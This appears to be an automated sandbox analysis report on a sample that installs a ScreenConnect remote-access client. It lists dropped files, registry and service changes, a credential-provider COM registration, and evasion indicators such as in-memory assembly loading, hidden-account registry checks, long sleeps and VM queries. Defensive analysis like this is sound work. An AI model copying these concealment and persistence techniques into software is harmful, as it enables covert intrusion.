                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: file.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: file.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: file.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: file.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250157916.000000001BD62000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250038149.000000001BD20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: file.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2185677970.0000000000B0D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: file.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2160635976.0000000004B50000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: file.exe, MSIE7CB.tmp.3.dr, MSIE7EB.tmp.3.dr, MSIEC9F.tmp.3.dr, setup.msi.0.dr, 5de52c.rbs.3.dr, 5de52d.msi.3.dr, 5de52b.msi.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: file.exe, MSIE114.tmp.2.dr, setup.msi.0.dr, 5de52d.msi.3.dr, 5de52b.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: file.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2249568704.000000001B9E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: file.exe
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              Source: 0.2.file.exe.30a0000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.file.exe.f578f8.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: file.exeStatic PE information: real checksum: 0x54fd91 should be: 0x56d5ba
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059E5522 push eax; retf 0_2_059E5529
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05A02F5A push eax; mov dword ptr [esp], edx0_2_05A02F6C
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05A01A91 push eax; mov dword ptr [esp], ecx0_2_05A01AA1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051B5530 push eax; mov dword ptr [esp], ecx8_2_051B5541
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051B9CF0 push eax; mov dword ptr [esp], ecx8_2_051B9CF1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051BB120 push eax; mov dword ptr [esp], ecx8_2_051BB121
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF64F0 pushfd ; ret 8_2_05BF651D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF3EC0 push esp; ret 8_2_05BF3ED3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF3E60 pushad ; ret 8_2_05BF3E73
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E37928 push ebx; retf 9_2_00007FFD33E3796A
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1FF8A push esi; iretd 10_2_00007FFD33E1FFC2
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E21E7F push esi; iretd 10_2_00007FFD33E21E80
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34122EC3 pushfd ; iretd 10_2_00007FFD34122F86
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34126097 push cs; iretd 10_2_00007FFD341260A5
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34132E40 push ebp; retf 10_2_00007FFD34132EBE
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34132EBF push ebp; retf 10_2_00007FFD34132ECE
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD341227B8 push edx; iretd 10_2_00007FFD341227BB

                              Persistence and Installation Behavior

                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-1b99-d78ca2f0bc1a}\inprocserver32
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC9F.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE7EB.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              Source: file.exe, 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: file.exe, 00000000.00000002.2161488488.0000000005800000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000005.00000003.2158572880.0000000004CD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2252418141.000000001BFF2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250157916.000000001BD62000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250038149.000000001BD20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: file.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\file.exe Memory allocated: 16B0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\file.exe Memory allocated: 32C0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\file.exe Memory allocated: 6940000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\file.exe Memory allocated: 6020000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\file.exe Memory allocated: 7940000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\file.exe Memory allocated: 8940000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\file.exe Memory allocated: 8BC0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 13B0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 1A50000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Memory allocated: 1890000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: F10000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: 1ABF0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: 2F70000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Memory allocated: 1B0D0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIEC9F.tmp
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Windows.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.InstallerActions.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIE7EB.tmp
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Core.dll
                              Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.Cab.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll
                              Source: C:\Users\user\Desktop\file.exe TID: 6368 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe TID: 2620 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: 5de52b.msi.3.drBinary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.3389372238.000000000100D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              Source: 0.2.file.exe.30a0000.0.raw.unpack, Program.cs | Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 0.0.file.exe.a263d8.4.raw.unpack, NativeLibrary.cs | Reference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
